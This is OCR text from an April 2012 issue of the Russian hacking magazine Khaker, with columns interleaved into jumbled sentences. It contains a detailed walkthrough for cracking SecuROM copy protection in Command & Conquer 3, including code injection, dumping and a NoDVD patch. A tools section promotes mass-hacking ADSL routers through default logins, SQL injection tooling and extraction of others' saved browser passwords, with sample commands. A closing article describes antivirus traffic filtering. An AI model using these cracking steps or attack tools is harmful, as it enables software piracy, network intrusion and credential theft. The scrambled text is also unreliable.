неповоротливой машины ется одной из самых популярных игр серии услышать о нем публично (exelab.ru в расчет не
Command & Conquer от небезызвестной берем). В первую очередь это объясняется на-
и достигнет поставленной цели конторы Electronic Arts. Последняя лояльно личием своего звездного протектора, но если
— OEP. Выведенную из строя относится к Sony Digital Audio Disc Corporation Sony после нескольких судебных разбира-
(SONY DADC), чью мать вспоминают, когда тельств отказалась от услуг нулевого кольца,
машину изучают Российские очередная игрушка, запротекченная SecuROM, то ребята из Protection Technology продолжают
инженеры… просит вставить оригинальный диск. Несмотря пользоваться низкоуровневыми функциями,

068 ХАКЕР 04 /159/ 2012

 Тибериумный реверсинг

программах, которые создают неприятности их WindowsNT\CurrentVersion\Windows\AppInit.

продуктам. Присоединиться к процессу тоже Так вот, наша задача — перехватить управ-
нельзя — он просто завершится. Впрочем, эта ление в нужном месте и показать адрес воз-
гадость действует только на время проверки врата, чтобы в нужное время присоединиться
диска. Неплохо! Для меня тогда это означало, к процессу. Почему я иду таким путем? Как уже
что ближайший месяц OEP и рабочий дамп я было упомянуто выше, вся проблема состоит
точно не увижу. Конечно, спустя несколько ме- в том, что разработчики прекрасно осведом-
сяцев я не хуже разработчиков знал, что и как лены о любых программах, которые создают
работает в SecuROM 7.33. Причем вся линейка проблемы их продуктам. Этот факт несложно
7.3x практически идентична, особенно это ка- проверить, прослушав CreateFile, FindWindow
сается виртуальной машины (самое заметное в исследуемом протекторе. Механизмы меж-
изменение: <space for rent> в более поздних процессного взаимодействия — вчерашний
версиях заменено на «You Are Now Entering a день; передовой способ борьбы с наворочен-
Restricted Area»). Но сейчас у меня только один ными защищалками — непосредственное
отладчик и никакой надежды выйти победи- внедрение в целевой образ защищенной про-
телем такого серьезного врага, над созданием граммы. Обнаружить его на порядок сложнее,
которого трудились весьма не глупые люди. ведь в этом случае мы используем ресурсы
самого протектора. Дабы противостоять такому
ФИЛОСОФИЯ ВЗЛОМА раскладу, прежде всего вводят проверку
Нам дали зеленый свет! Снимаем дамп!
Пробить навесную броню и доехать до OEP целостности файла (динамическая защита). Ту
тупым ковырянием в отладчике — слишком самую, которая отсутствует в нашем случае (чем
где абсолютным чемпионом по вызову являет- долго и неэффективно. Будем бить в борт! я, собственно, воспользовался). Едем дальше.
ся KeBugCheckEx. Первая дыра в защите не заставила себя Я уже сказал, что для компиляции CNC3.exe
Таким образом у разработчиков осталась долго искать: я сразу заметил, что протектор использован Microsoft C++ 7.0. А ведь очевидно,
одна арена для битвы — прикладной уровень. не проверяет целостность всего файла. Ну, не что и cnc3game.dat откомпилирован тем же ком-
И, естественно, они приложили максимум то чтобы совсем не проверяет, нечто подобное пилятором. Точка входа выглядит как:
усилий для обеспечения надежной защиты… имеется, но вот только идет оно как провер-
которая была пробита, разобрана и демонти- ка участков и направлена, прежде всего, на 004628DA CALL 004784B8
рована :). выявление программных точек останова (так 004628DF JMP 004626FA
называемый «перекрывающий код»). Она мне
WHAT IS TARGET никак не мешала, поэтому в практическом Реально точка входа находится по
Сначала определимся с нашим инструмента- плане это означает, что возможно внедрение операнду прыжка — 004626FAh. Функция
рием. Собственно, понадобится сама игруш- X-кода в образ файла статическим путем. по адресу 004784B8h ничем полезным не
ка Tiberium Wars (с последним патчем 1.9), Строго говоря, X-код — это осмысленная со- занимается, и я ее всегда игнорирую. Однако
для снятия дампа — OllyDbg 1.10 с OllyDmp вокупность байт, внедренных посторонним в ней мы находим, что она вызывает не-
(собственно как дампер) и OllyDbg 2.0 без лицом или программой в целевой код процесса сколько API (GetSystemTimeAsFileTime,
каких-либо плагинов. Несмотря на такой столь с целью выполнения определенной задачи. GetCurrentProcessId…). Для нас это означает
скромный набор, в нашем случае работать Различают следующие типы: только одно: если в GetSystemTimeAsFileTime
можно с одним отладчиком, а основным 1. On-line patching. Через WinAPI внедрить X-код, который перехватит управ-
оружием будет ассемблерный код. Но прежде ReadProcessMemory/WriteProcessMemory ление и покажет нам адрес возврата, то у нас
всего ответим на вопрос, какой исполняе- читаем/пишем в адресное пространство будет замечательная возможность попасть
мый файл требуется загрузить в отладчик. процесса. К примеру, таким образом, ставят в окрестности OEP и снять рабочий дамп, при
Переходим в папку с установленной игрой. флаг регистрации в NtExplorer под эгидой условии, что после распаковки стартовый
Первым на глаза попадается безобидный AsPack 2.11c, чтобы не заморачиваться код действительно на своем законном месте.
CNC3.exe: судя по точке входа, откомпили- с распаковкой. Однако современные про- И хотя SecuROM 7.33 проверяет прологи
рован Microsoft C++ 7.0, стандартные секции текторы типа Themida не дают доступ в свое некоторых значимых WinAPI, этот список
.text, .rdata… Правда, если его запустить, нас адресное пространство. весьма неполон, плюс сама проверка идет
вежливо попросят вставить оригинальный 2. Offline patching. Или статический патчинг. только в самом начале. Вот тебе и следующий
диск. Извините, имеется только Daemon Собственно, наш случай, когда ничто не недочет! Теперь пора собрать нашу куму-
Tools с образом, поэтому возникает вполне мешает писать прямо в исполняемый об- лятивную гранату. Место для базирования
нормальное желание развязать четвертую раз и перехватывать в нем управление. я выбрал в конце секции .est и приступил
тибериумную драку и, в конце концов, ото- Обнаружить такого «Штирлица» у себя к сборке — написанию asm-кода, который
драть проверку диска от программы. Так как я в тылу протекторам на порядок сложнее. самостоятельно выполнит всю работу. Весь
был знаком с предыдущими играми из серии При необходимости одурачивают защиту,
CnC, то знал, что CNC3.exe играет роль обертки делая оригинальную копию исполняемого
и просто через WinAPI CreateProcess запускает файла и через GetCommandLine/GetFilePath
нужный файл с расширением .dat (на самом возвращают ссылку на него.
деле обычный Microsoft PE EXE format) с нуж- 3. Dll-hijacking. С учетом того, что при загруз-
ными параметрами. Несложно догадаться, ке образа первыми получают управление
что искомая цель — \RetailExe\1.9\cnc3game. динамические библиотеки, записанные
dat. Грузим в отладчик упомянутый файл и по в его таблице импорта (точнее, функция
секции .securom понимаем, с чем имеем дело. DllMain), то мы первыми получаем бразды
F9… Милое окошко с надписью «Не удалось правления над защитой и успеваем скрыть
запустить требуемый модуль безопасности». себя задолго до работы навесной брони.
Еще раз его можно прочитать, если запустить
любой API-шпион, ProcMon… Одним словом, Напоминаю, что для быстрой загрузки можно Понимание главного хранилища является ключевым для
разработчики прекрасно осведомлены о всех прописаться в HKLM\Software\Microsoft\ взлома алгоритмов работы виртуальной машины

ХАКЕР 04 /159/ 2012 069

ВЗЛОМ

код состоит из двух частей. Первая доста- LINK

вит саму гранату на место: заменит пролог • bit.ly/x4iBzF —
GetSystemTimeAsFileTime на безусловный англоязычная статья
по виртуальной
переход ко второй части. Собственно, в этом машине SecuROM
случае получаем управление из распаковщи- 7.30. Я нашел эту
ка (определить место которого несложно, по- публикацию когад
уже завершал
ставив точку останова на секцию .text) и туда исследование, но
же его возвратим после того, как переход бу- тем приятнее было
дет установлен. Кстати, первоначально, чтобы увидеть, что в целом
наши выводы
получить доступ на запись в секцию kernel32. совпали. Однако
text (дело было на висте), я офлайн на 2k3 в статье структура
VM излагается
через PeTools устанавливал атрибут Write, в несколько ином
пересчитывал контрольную сумму… и ведь виде, да и некоторых
работало! Способ весьма дурной, учитывая, аспектов работы VM
я не увидел.
что есть WinAPI VirtualProtect, но нестандарт-
ные подходы иногда тоже на руку. Переходим • bit.ly/xG9Lry —
NoDVD для CnC3:
ко второй части нашего представления. Tiberium Wars v1.9.
Первоочередной задачей здесь является по- Отличительной
каз адреса возврата и удержание управления особенностью
является
до прибытия на место отладчика. Я реализо- пристроенная
вал свой алгоритм, который переводит large в секцию .mem-
integer в ACSIIZ-строку (об ltoa я тогда не ory виртуальная
машина. В статье
знал), а задачу показа и удержания управле- взят в качестве
ния элегантно решил с помощью MessageBox, основного
примера. Новичкам
но затем управление передается обратно рекомендуется
в WinAPI. Впрочем, для показа можно нагло начать с него.
использовать функционал самого протектора
— CreateThread с адресатом 00F9AD0E, но это
непроизводительно. Итак, граната собрана,
попробуем! Монтируем мини-дамп. Запускаем
игру. Нас интересуют все MessageBox после
проверки: 00DDCE77, 76B414D4, 7C34207B,
0040A5AE… Сто-ооп! Последний, да ведь
вызов идет из секции .text! We need attach
now! Присоединяемся к процессу ольгой 1.10,
которая с дампером, и переходим по послед-
нему адресу. Невероятно, но мы остановились
практически в OEP (точка входа расположена
по адресу 0040A2C7). Немногим позже, когда
Оптимизируя скорость работы виртуальной машины, в SONY DADC решили оставить без
виртуальная машина (VM) стала более-менее обфускации один из островков!
изучена, было сделано еще одно умошоки-
рующее открытие (снова просчет команды
из SONY DADC) — попасть в OEP можно В итоге не выигрываем ни в размерах дампа, MOV DWORD PTR DS:[EBX+0C],EDX
с ювелирной точностью и при этом еще более ни в быстродействии. MOV BYTE PTR DS:[EBX+10],95
безопасным путем. И как вы думаете, что В общей сложности на полный разбор VM MOV DWORD PTR DS:[EBX+14],EBX
этому помогло? SecuROM v7.33 Virtual Machine, ушло около двух месяцев, причем первые MOV DWORD PTR DS:[EBX+1C],ESP
чья задача — наоборот защищать от взлом- полтора я попросту копался во всем без
щиков, но никак уж не помогать им! разбору, пока не «догадался» начать ис- Код, приведенный выше, с потрохами выдает
следование с самого начала цепочки — и вот главное хранилище, которое играет ключевую
SECUROM V7 VIRTUAL MACHINE тут началось… Сама SecuROM v7.3x VM по роль в VM. Разберешься в переменных и в обла-
Инженеры Sony DADC как в воду глядели: существу не является виртуальной маши- сти хранения промежуточных данных — считай,
с готовым образом добраться до OEP и снять ной в привычном представлении, никакой что VM на 90% взломана! Во-вторых, стало оче-
дамп — по факту дело нескольких минут, асм-код там не эмулируется. Все куда проще: видно, что по существу здесь все наштамповано
матерых взломщиков это никак не остановит. по существу процедура с двумя аргументами методом copy/paste. В-третьих, сумасшедшее
Навесная защита бессильна, значит, выход (LPDWORD и VOID) и тремя вариантами работы. количество закономерностей вплоть до исполь-
один — сделать максимально неработоспособ- Ну а дальше остается только удивляться. зования регистров CPU на островках. А тот факт,
ным дамп! Следуя этой логике, большинство Во-первых, чтобы понять, как оно работает, что один из островков находится без обфускации
не хочет заморачиваться с VM, прописывая просто внимательно изучи первый островок — вообще убило! Единственное, что здесь ре-
ее сложную структуру, в которой нереально (кусок кода от spin-блокировки до JMP EAX), ально доставляет, это ROL-байт (crypt-byte), так
разобраться за приемлемое время, и предпо- который, как ни странно, выполняется всегда, как без знания того, какие точно матоперации
читая дампить всю выделенную виртуальную и всегда первый. с ним выполняют все 255 островков виртуальной
память, и имеющую, и не имеющую отношение машины, невозможно построить кулхацкерскую
к VM, и приваривают ее в виде отдельной сек- REP STOS DWORD PTR ES:[EDI] автоматизированную ломалку и снять все за
ции, предварительно догадавшись вставить …. раз. Собственно, кому хочется понимать, о чем
после конструкции «MOV EAX, 1; CPUID;» MOV DWORD PTR DS:[EBX+4],EAX все-таки идет речь — читайте полный вариант
инструкцию «MOV AL, CURRENT_CPUID_KEY_ MOV EAX,DWORD PTR SS:[ESP] статьи на диске или на нашем сайте. Следующий
DELTA_DECODE» и проделать оное еще 254 раза. MOV DWORD PTR DS:[EBX+8],EAX вопрос — реально ли отодрать VM от тибериума?

070 ХАКЕР 04 /159/ 2012

 Тибериумный реверсинг

Интуиция подсказывает, что более чем! Я уже

успел проболтаться, что вариантов работы три.
Начнем с последнего (способ №2), собственно
нумерующихся по мере их появления в за-
щищенной программе. Способ №2 полностью
завязан с двумя противоположными по логике
работы алгоритмами, представленными в виде
двух процедур с двумя аргументами, которые
отрабатывают друг за другом. В первом заносим
любое число (например, 1), второй — ссылка на
массив ключей (offset 00B93AFC), которые копи-
руются в стек VM. На выходе в EAX получается
что-то типа закодированного числа (0790A442),
которое было передано в первом аргументе.
Если это закодированное число (0790A442) скор-
мить в первый аргумент алгоритма обратного
хода, то на выходе в EAX мы получаем ту же 1,
при условии, что массив ключей был одинаков
(offset 00B93AFC). Короче, имеем две функции, SecuROM v7.33.017 и не представляет, какими серьезными последствиями грозит внедренный X-код
дающие в сумме нулевой эффект. Собственно,
роль VM в них такова: в первом случае крышуют- GetModuleFileNameA, DeleteFileA, GlobalFree. 43E2AB9D) упрятанные данные. Наиболее
ся асм-инструкции Обращение к VM в этом случае всегда ознаме- эффективное решение.
новывается CALL EAX, информация черпается
MOV ECX, DWORD PTR SS:[EBP+8] по известным смещениям в таблице импор- Особенностью способа №1 является пере-
MOV ECX, DWORD PTR DS:[ECX] та. В общей сумме в дампе набралось около ход к VM: CALL ANY_OFFSET Æ JMP DWORD
MOV EAX, DWORD PTR SS:[EBP+0C] десятка вызовов — смело выдираем и ставим PTR DS:[перемещаемый адрес] Æ база за-
AND EAX, ECX нормальные вызовы WinAPI. Наиболее про- проса Æ JMP [VM_VIRTUAL_ADDRESS] Æ VM.
MOV ECX, EAX блемным является самый первый способ (по В остальных случаях все обходится прямым
причине сумасшедшего количества вызовов — вызовом VM без второго элемента в цепочке.
Во втором — инструкция NOP в переносном около 10k). Тут два варианта: Суть в том, что инструкция JMP DWORD
смысле. Причем прийти к этому выводу можно 1. Дампить. Простая техническая реализация, PTR DS:[перемещаемый адрес] играет роль
и без вскрытия VM, просто сравнив две упомя- но требуется перетыкать все возможные железнодорожной стрелки. Первый раз, когда
нутые процедуры (обратного и прямого хода). меню, да и вообще пройти чуть ли не всю вызывается внутренняя функция, «стрелка» пе-
Следующие в списке способы — №1А и №1. игру. В отличие от «Косынки» и «Пасьянса» реведена на VM, а точнее — в базу запросов, где
Они похожи, но с той лишь разницей, что — верный способ убить время с пользой! происходит заправка упомянутых выше двух ар-
первый после выхода из VM переносит нас 2. Зная структуру всех 255 островков (на гументов для виртуальной машины (LPDWORD
в запрашиваемую WinAPI, а второй — в за- самом деле в способе №1 участвуют около и VOID). В процессе работы VM извлекает адрес
прашиваемую внутреннюю функцию (к слову, 50), по сигнатуре базы запросов написать запрашиваемой функции и ставит его как
это может быть одна асм-инструкция, чаще на С++ программу, которая ищет все базы перемещаемый адрес — стрелка переведена!
всего — операция с резервированием стека). запросов, затем строит всю цепь работы После выхода из VM происходит переход в нашу
Скрытых WinAPI не так уж и много, вот не- VM и в нужном месте виртуального стека запрашиваемую функцию, ну а после первого
полный список: SetUnhandledExceptionFilter, вытаскивает и дешифрует (XOR SecretDATA, вызова все, кто будет ее вызывать, попадают
сразу куда нужно. Как видишь, оптимизация!
Кстати, количество инструкций, которые
выполняются за один прогон виртуальной ма-
шиной в способах №1 и №1А, колеблется около
3k, зато способ №2 бьет все рекорды — 30k.
Причем островок без обфускации принадлежит
именно последнему способу. Финишная работа
с дампом включает перестроение в нормальный
вид секции кода, удаление ненужных и посто-
ронних внедрений типа

0044F4D2 DEC DWORD PTR DS:[158297A]

0044F4D8 JE NODVD.00482DE5
00482DE5 MOV DWORD PTR DS:[158297A],18D
00482DEF JMP NODVD.0044F4DE

Последним пунктом отсылаем дамп в Sony

DADC. На этом тибериумная драка заканчива-
ется.

ЗАКЛЮЧЕНИЕ
В заключение я просто поблагодарю SONY
DADC за ее действительно интересный про-
дукт (для хакеров в частности)! До встречи на
OEP на горизонте! VM под контролем xD страницах ][. z

ХАКЕР 04 /159/ 2012 071

ВЗЛОМ

X-Tools
СОФТ ДЛЯ ВЗЛОМА И АНАЛИЗА БЕЗОПАСНОСТИ

Автор: Автор: Автор:

slider garinn The SX Team
URL: URL: URL:
bit.ly/yMgiB6 ripper.zu8.ru bit.ly/ht8krs
Система: Система: Система:
*nix/win Windows Windows

1 2 3
МАСС-ХЕК ADSL-РОУТЕРОВ ЛЕГКИЙ ПОИСК И РАСКРУТКА ВОССТАНАВЛИВАЕМ ПАРОЛИ
ВМЕСТЕ С BVSCANNER SQL- ИНЪЕКЦИЙ ОТ БРАУЗЕРОВ
BVScanner (Black Vlastelin Scanner) — это Программа SQLRipper — это продвинутый Представь такую ситуацию: внезапно ты забыл
маленький, но крайне интересный скрипт и удобный инструмент, предоставляющий все свои (или не совсем свои :) пароли от веб-
на Perl’е. Он позволяет сканить заданные мощные, гибкие и очень простые в исполь- сервисов. Эти пароли ты предварительно на
диапазоны адресов на предмет наличия зовании функции для поиска и анализа протяжении долгого времени сохранял в своем
в них ADSL-роутеров. В процессе скана прога SQL–инъекций на основе БД MySQL и MSSQL. браузере. Каким же образом их добыть? Конеч-
пробует войти в обнаруженные роутеры с по- но, можно погуглить и найти множество раз-
мощью дефолтных логинов и паролей. Если Возможности программы: личных утилит непонятного происхождения,
вход удался, то все найденные учетные записи • поиск относительных и абсолютных ссылок но есть способ лучше! Представляю тебе за-
выводятся на экран и записываются в файл на страницах; мечательный софт под символичным названи-
accounts.txt. • задание максимального количества найден- ем Browser Password Decryptor. Данная прога
ных ссылок на странице; может легко и просто восстанавливать пароли
Запуск скрипта крайне тривиален: • проверка найденных ссылок на SQL-ошибки; из следующих браузеров: Firefox, Internet
perl bvscanner.pl • определение количества полей в SELECT- Explorer, Google Chrome, Google Chrome Canary,
>Первый IP-диапазон запросе c помощью операторов ORDER BY, Opera Browser, Apple Safari, Flock Browser.
>Второй IP-диапазон GROUP BY, UNION SELECT;
• точное определение полей вывода; Возможности и особенности софтины:
Кстати, так как сканер является много- • возможность замены пробелов и коммента- • command-line и GUI-интерфейсы в комплекте;
поточным, за очень короткое время можно риев на аналоги в случае наличия IDS; • восстановление паролей любой длины
легко получить просто огромное количество • сохранение промежуточных результатов и сложности;
аккаунтов. В результате успешного скана парсинга в файл .dbf; • автоматический поиск всех поддерживае-
и получения доступа к учетке злоумышленник • чтение структуры базы данных и ее сохране- мых браузеров;
может сделать следующее: ние в XML-файл; • функционал сортировки и редактирования
• изменить параметры учетной записи или • выгрузка произвольной таблицы и сохране- найденных паролей;
настройки модема; ние ее в .dbf. • сохранение результатов в HTML/XML/Text;
• продолжить целевую атаку внутри сети; Хотя программа и обладает интуитивно- • программа представлена в Portable-
• создать PPTP-VPN на модеме, подключиться понятным интерфейсом, но тем не менее варианте, что исключает необходимость ее
к нему и снифать трафик в открытом виде; предлагаю тебе просмотреть обучающий ролик установки.
• перепрошить модем, предварительно (bit.ly/ydHA2o) с описанием основных ее фич, Пример использования утилиты из команд-
внедрив в образ разный ядовитый софт, — а также следить за всеми обновлениями на ной строки: BrowserPasswordDecryptor.exe
например, те же самые сниферы. официальной странице утилиты. <output_file path>.

072 ХАКЕР 04 /159/ 2012

 X-Tools

Автор:
Mesut Timur ПОИСК СОСЕДЕЙ САЙТА ВМЕСТЕ С FINDDOMAINS
URL:
code.google.com/p/ FindDomains — это полезнейшая димо получить идентификатор Bing
finddomains
Система: вещь для пентестеров. Данная прога Developers. Сделать это можно тут:
*nix/win представляет из себя многопоточный binged.it/6Acq5, а полученный ID
поисковый механизм, предназначен- необходимо вставить в файл appid.
ный для раскрытия доменных имен, txt, находящийся в корне папки про-
сайтов и виртуальных хостов, кото- граммы.
рые могут быть расположены как на Некоторые особенности утилиты:
одном, так и на соседних IP-адресах • работает с первой 1000 результа-
(это расширит список потенциаль- тов поиска Bing;
но уязвимых мест жертвы). Так как • помимо Бинга получает доменные
FindDomains работает в консоли, ты имена с помощью DNS;
легко сможешь встроить ее в свою • работает в многопоточном режиме;
пентестерскую автоматизированную • прекрасно работает с Mono.
систему.
Утилита использует движок Bing’а, Пользоваться утилитой очень просто:
поэтому для работы будет необхо- FindDomains.exe www.google.com

Автор: Автор: Автор:

Anton Keks The SX Team s3my0n
URL: URL: URL:
angryip.org bit.ly/ihELsw bit.ly/w87YuA
Система: Система: Система:
*nix/win/mac Windows *nix/win

4 5 6
ANGRY IP SCANNER — СЕТИ ПОД ИЩЕМ АНОМАЛИИ В PE-ФАЙЛАХ ЮЗАЕМ БАЗУ EXPLOIT-DB.COM
КОНТРОЛЕМ ИЗ КОМАНДНОЙ СТРОКИ
Для усложнения задачи реверсера различные
Если твоя повседневная работа связана пакеры и протекторы модифицируют заголов- Если ты являешься заядлым консольщиком,
с сетями и их безопасностью, то наверняка ки PE-файлов. Иногда аномалии в заголовках то наверняка каждый раз в поисках экс-
ты должен знать о такой культовой програм- могут уронить различные дебаггинг-тулзы плойтов тебе было лениво открывать браузер
ме как Angry IP Scanner (или просто ipscan). и другие GUI-анализаторы, затруднив таким и залазить на exploit-db.com. С появлением
Данный кроссплатформенный и опенсорс- образом процесс изучения исполняемого фай- утилиты getsploits (кстати, написана она на
ный сканер прежде всего предназначен для ла. В таких случаях тебе поможет ExeScan — Питоне) необходимость в этом отпала! Данная
сканирования диапазонов IP-адресов в сети скрипт на Python’е, специально предназначен- тулза может искать определенные сплойты/
и соответствующих им открытых портов. ный для выявления таких аномалий. Утилита шелл-коды/описания сплойтов с помощью
Прога просто пингует каждый айпишник быстро сканирует выбранный исполняемый нескольких поисковых опций, а затем выво-
на проверку его жизнеспособности, затем файл и обнаруживает все виды возможных дить описания и линки для всего найденного
опционально получает имя хоста, MAC-адрес, аномалий в его заголовках. Обнаружение стаффа.
список открытых портов и так далее. происходит с помощью подсчета контрольной
Кстати, с помощью плагинов (которые ты сам суммы, размера различных полей в заголовке, Основные опции утилиты:
можешь написать на java) вполне реально не- размера сырых данных, выявления имен non- • o: вывод результатов в файл;
хило расширить список получаемых данных. ascii/пустых секций и так далее. • q: «тихий» режим работы;
Также в сканере присутствует целый ряд • h: показать экран помощи.
приятных фич вроде получения NetBIOS- Функционал скрипта:
информации (имя компьютера, рабочая группа • автоматизация поиска аномалий в PE; Опции поиска:
и имя текущего Windows-юзера), определения • определение сигнатур компиляторов и па- --author: — автор эксплойта;
веб-сервера, сохранения результатов скани- керов; --platform: — платформа (выбор из 47 пунктов);
рования в CSV-, TXT- и XML- форматы. • сканирование API для известной малвари; --type: тип сплойта
Чтобы начать процесс скана, необходимо • отображение заголовка PE и таблицы им- --osvdb: OSVDB-идентификатор сплойта;
просто вбить желаемый диапазон адресов порта; --cve: CVE-идентификатор сплойта.
(например, от 192.168.0.1 до 192.168.0.255) • нативная поддержка генерации различных
в соответствующие окна или применить отчетов. Примеры поиска различных эксплойтов:
опцию их случайной генерации, а затем на- Для использования сканера тебе необхо- getsploits.py -o linux_shellcode.txt
жать на кнопку старта. В результате начнется дима питоновская библиотека PEFile от Эро --type shellcode
многопоточный процесс скана, результаты Карреры. Найти ее ты также сможешь на на- getsploits.py -o freebsd_x86-64_local.
которого ты сможешь наблюдать прямо у себя шем диске. Пример запуска сканера: exescan. txt --platform 10
на экране. py -a <path to exe file. getsploits.py --author maxe vbulletin

ХАКЕР 04 /159/ 2012 073

MALWARE Евгений Дроботун ([email protected])

ПОКОНЧЕНО!
С АНТИВИРУСАМИ

Что у нас осталось? Дай-

ка вспомнить. А, вот что:
контроль сетевого трафика
и противодействие drive-by
загрузкам, а также способы
запуска подозрительных
приложений в изолированной
и контролируемой среде
(именно так правильно
раскрывается понятие
«песочница»). Разберем все
это прямо сейчас!

ПОСЛЕДНЯЯ СТАТЬЯ ОБ
УСТРОЙСТВЕ АВЕРОВ:
МОНИТОРИНГ СЕТЕВОЙ
АКТИВНОСТИ И ПЕСОЧНИЦЫ
074 ХАКЕР 04 /159/ 2012
 С антивирусами покончено!

КОНТРОЛЬ ТРАФИКА НА НИЗКОМ

УРОВНЕ
Упрощенно модель сетевой подсистемы
Windows можно представить в виде не-
скольких уровней. На самом верхнем уровне
находится библиотека ws_32.dll, в которой
реализованы функции Winsock (send, recv,
connect и так далее). Большинство приложе-
ний взаимодействует с внешним миром (то
есть с Сетью) именно через эту библиотеку,
перехватив вызовы функций которой, можно
легко посмотреть все, что эти приложения
отправляют в Сеть или принимают из нее.
Когда-то давно некоторые брандмауэры
и другие системы защит так и поступали, но
в настоящее время так уже никто не делает,
поскольку, во-первых, зловредные приложе-
ния могут работать в обход ws_32.dll, вызывая
функции более низких уровней, а во вторых,
NDIS-фильтры, установленные в системе Avast’ом и «Касперским»
большая часть сетевого трафика также может
проходить на более низком уровне.
о мнению операционной системы от что удовлетворяет заданным условиям, про- Ниже ws_32.dll находится драйвер afd.sys
П Майкрософт, файлы из интернета
могут быть полезны. А еще они могут
пускается, остальное — блокируется (с экран-
ным предупреждением или без него, с записью
(Ancillary Function Driver for WinSock — вспо-
могательный служебный драйвер), в котором
быть вредны. И для того, чтобы отделить в журнал событий или без — в зависимости от как раз и реализованы все функции работы
первый тип файлов от второго, рядовой юзер настроек компонента сетевой защиты). с сокетами (создание сокетов, установка
использует антивирус. А как современные И опять мы вышли на ту самую — нашу соединения и так далее). Можно сказать, что
антивирусные средства определяют «бла- любимую :) — двухкомпонентную схему анти- ws_32.dll представляет собой высокоуров-
гонадежность» того, что идет из сети? Как вирусной защиты из самой первой статьи. Есть невую обертку над afd.sys. Если быть точнее,
различные системы защиты могут проконтро- нечто, что «сидит» на всех возможных путях то между afd.sys и ws_32.dll находится еще
лировать и остановить трафик, порождаемый сетевого трафика в компьютере и перехваты- и msafd.dll в качестве так называемой про-
вредоносными программами? вает этот трафик, а есть нечто, что анализирует межуточной обертки. Некоторые брандмауэры
Чтобы ответить на эти вопросы, для на- этот трафик и принимает решение о дальней- «садятся» на эту библиотеку с целью филь-
чала необходимо определиться с некоторыми ших действиях. Эти два «нечто» и являются трации трафика, но эффективность такого
основными вещами. Прежде всего, понять, чем технической и аналитической составляющими решения оставляет желать лучшего, поскольку
является компонент антивирусной защиты, от- компонента антивирусной защиты, ответ- вредоносы могут запросто обратиться напря-
ветственный за безопасность взаимодействия ственного за сетевую безопасность. мую к afd.sys, а то и вообще мимо всех сокетов.
с сетью. Это не что иное, как фильтр, который Аналитическая составляющая в своих Опустившись еще ниже, можно увидеть
находится между приложениями и сетевыми действиях опирается на сигнатуры и эвристи- драйвер tcpip.sys, в котором реализован
компонентами операционной системы, решая, ческий поиск: шаблоны, правила, весовые ко- протокол tcp/ip. Это так называемый уровень
что можно, а что нельзя. Для этого он произво- эффициенты — все то, что мы уже «проходили» транспортного (или сетевого) протокола TDI
дит внедрение указанного фильтра в ключевые ранее. А вот о том, что касается технической (Transport Data Interface — интерфейс пере-
места взаимодействия приложений и сети, осу- составляющей, — той самой, которая должна дачи данных). Здесь также можно найти,
ществляя анализ всего трафика на предмет со- перехватывать трафик на всех возможных например, nwlnkipx.sys, реализующий про-
ответствия определенному набору правил. Все, путях, — мы поговорим более подробно. токол ipx. Для фильтрации трафика на этом

Перехваты IoCreateDevice в «Касперском» и DrWeb, перехват TdiRegisterDevi- Часть содержимого inf-файла драйвера фильтра klim6.sys из состава «Антивируса
ceObject из tdi.sys в «Касперском» шестой и седьмой версий Касперского»

ХАКЕР 04 /159/ 2012 075

MALWARE

Перехват NDIS-функций антивирусом от компании Comodo (вверху) и в OutPost FireWall Pro 7.0 (внизу)

уровне необходимо перехватывать все вызовы драйвер сетевой карты, поэтому антивирус или соко, да и такой фильтр-ловушка может быть
к устройствам \Device\RawIp, \Device\Udp и \ брандмауэр, «сидящий» на NDIS-уровне, пере- установлен в системе всего лишь один.
Device\Tcp (в случае работы по IPv6 — \Device\ хватывает практически весь трафик, который В этом вопросе все известные антивирусы
RawIp6, \Device\Udp6, \Device\Tcp6 соот- только проходит через компьютер. проявляют единодушие — чтут рекоменда-
ветственно). Это достигается либо вызовом Сегодня подавляющее большинство пра- ции компании–производителя операционных
IoAttachDevice, либо прямой модификацией вильных антивирусов контролируют трафик систем и третий способ в своих продуктах
указателей таблицы диспетчеризации, либо именно на этом уровне. Существует по мень- не применяют (хотя, говорят, встречаются
перехватом IoCreateDevice до инициализа- шей мере три более или менее документиро- производители, которые эти рекомендации
ции этих устройств, чтобы в дальнейшем ванных и легальных способа проделать это. игнорируют, но мне что-то такие антивирусы
полностью их контролировать. Некоторые из Первый способ (самый легальный из всех и ре- и брандмауэры не попадались).
антивирусов именно так и поступают. Напри- комендованный Microsoft к использованию) — Что касается оставшихся первых двух
мер, ранний «Касперский» перехватывал эту это так называемый NDIS Intermediate Driver способов, то подавляющее большинство
функцию путем модификации таблиц импорта (промежуточный драйвер NDIS). Второй способ применяют либо только первый, либо первый
в нужных драйверах, так же делает Dr.Web, (его еще иногда называют «псевдопромежу- в сочетании со вторым, и лишь некоторые до-
изменяя таблицу импорта в драйвере tcpip. точный драйвер») есть не что иное, как пере- вольствуются только вторым.
sys. Для этих же целей «Касперский» шестой хват некоторых функций из ndis.sys. Третий Промежуточные NDIS-драйверы в антиви-
и седьмой версий перехватывал функцию способ — Filter Hook Driver (драйвер фильтра русных программах могут быть двух видов: не-
TdiRegisterDeviceObject из tdi.sys, модифици- ловушки) представляет собой обычный kernel- посредственно промежуточный драйвер — как
руя таблицу экспорта этого драйвера. mode драйвер, который фильтрует сетевые правило, в Windows XP, так как других там и не
Далее, еще ниже, находится драйвер под пакеты на уровне IP. Microsoft категорически предусмотрено (NDIS версии 5), и драйвер-
названием NDIS (Network Driver Interface не рекомендует использовать этот способ фильтр — эта разновидность промежуточных
Specification — спецификация интерфейса в средствах контроля трафика и антивирусной NDIS-драйверов появилась начиная с Windows
сетевых драйверов). Ниже него — только защиты. Этот драйвер ставится слишком вы- Vista (NDISверсии 6).
Остановимся на различиях промежуточных
драйверов и драйверов-фильтров. Итак, когда
трафик движется в сеть, то есть от протокола
к сетевой карте, он проходит через очередь
пользовательских драйверов, которую сфор-
мировал NDIS. Внутри этой очереди распола-
гаются промежуточные драйверы, которые
выстраиваются в очередь по неизвестному
алгоритму, однако спецификация гарантирует,
что трафик пройдет через каждый драйвер
в этой очереди. Промежуточный драйвер пред-
ставляет собой обманку: «сверху», то есть для
драйверов, которые располагаются над ним,
он выглядит как минипорт (хотя настоящие
минипорты еще далеко внизу), а «снизу» — как
протокол (хотя протоколы далеко вверху).
В свою очередь драйвер-фильтр — это
драйвер, который располагается также на
пути следования трафика от сетевой карты до
протоколов, однако конкретное его местополо-
жение в очереди определяется настройками,
Модули BHO от «Антивируса Касперского» в Internet Explorer содержащимися в inf-файле этого драйвера-

076 ХАКЕР 04 /159/ 2012

 С антивирусами покончено!

фильтра. Помимо месторасположения

